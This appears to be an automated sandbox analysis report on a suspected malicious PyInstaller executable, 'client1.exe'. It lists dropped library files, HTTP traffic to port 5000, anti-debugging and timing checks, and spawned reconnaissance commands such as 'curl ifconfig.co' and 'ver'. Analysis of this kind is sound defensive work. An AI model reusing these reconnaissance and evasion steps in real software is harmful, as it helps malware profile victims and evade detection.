Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2070 push rbp; retf 2_2_00007FFBAB1C2073
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\python3.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\simplejson\_speedups.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\libffi-8.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_brotli.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\python311.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_cffi_backend.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\bcrypt\_bcrypt.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\select.pydJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 5000
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F623DF0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF79F623DF0
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE8572C rdtsc 2_2_00007FFBAAE8572C
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\python3.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\simplejson\_speedups.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_brotli.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_cffi_backend.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\python311.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\bcrypt\_bcrypt.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\select.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeAPI coverage: 1.3 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F636714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF79F636714
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F627820 FindFirstFileExW,FindClose,0_2_00007FF79F627820
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F636714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF79F636714
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F6409B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF79F6409B4
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F636714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF79F636714
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F627820 FindFirstFileExW,FindClose,2_2_00007FF79F627820
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F636714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF79F636714
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F6409B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF79F6409B4
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2158 FindFirstFileW,2_2_00007FFBAB1C2158
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE83229 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,2_2_00007FFBAAE83229
Source: client1.exe, 00000002.00000003.1476070498.000001692E63F000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1475442260.000001692E63F000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1474501548.000001692E63F000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1475000813.000001692E63F000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690809690.000001692E5C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr
Source: client1.exe, 00000002.00000003.1488562521.0000016930580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mllkkjihgfSLUZ\\\\\\\\\\\\\\\\\\\\
Source: curl.exe, 00000005.00000003.1485944623.00000249273D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: cacert.pem.0.drBinary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd

Anti Debugging

barindex
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE8572C2_2_00007FFBAAE8572C
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE842412_2_00007FFBAAE84241
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE8572C rdtsc 2_2_00007FFBAAE8572C
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F62B69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79F62B69C
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F6425A0 GetProcessHeap,0_2_00007FF79F6425A0
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F62B880 SetUnhandledExceptionFilter,0_2_00007FF79F62B880
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F62B69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79F62B69C
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F62AE00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF79F62AE00
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F639AE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79F639AE4
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F62B880 SetUnhandledExceptionFilter,2_2_00007FF79F62B880
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F62B69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF79F62B69C
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F62AE00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF79F62AE00
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F639AE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF79F639AE4
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAA710140 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAA710140
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAA710A68 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAA710A68
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAA733058 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAA733058
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAA732A90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAA732A90
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2070 SetUnhandledExceptionFilter,2_2_00007FFBAB1C2070
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE85A1F IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAAE85A1F
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB4A2D10 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB4A2D10
Source: C:\Users\user\Desktop\client1.exeProcess created: C:\Users\user\Desktop\client1.exe "C:\Users\user\Desktop\client1.exe"Jump to behavior
Source: C:\Users\user\Desktop\client1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.co"Jump to behavior
Source: C:\Users\user\Desktop\client1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl ifconfig.coJump to behavior
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F6489B0 cpuid 0_2_00007FF79F6489B0
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\cryptography-43.0.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\cryptography-43.0.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\cryptography-43.0.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\cryptography-43.0.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\_bz2.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\_lzma.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
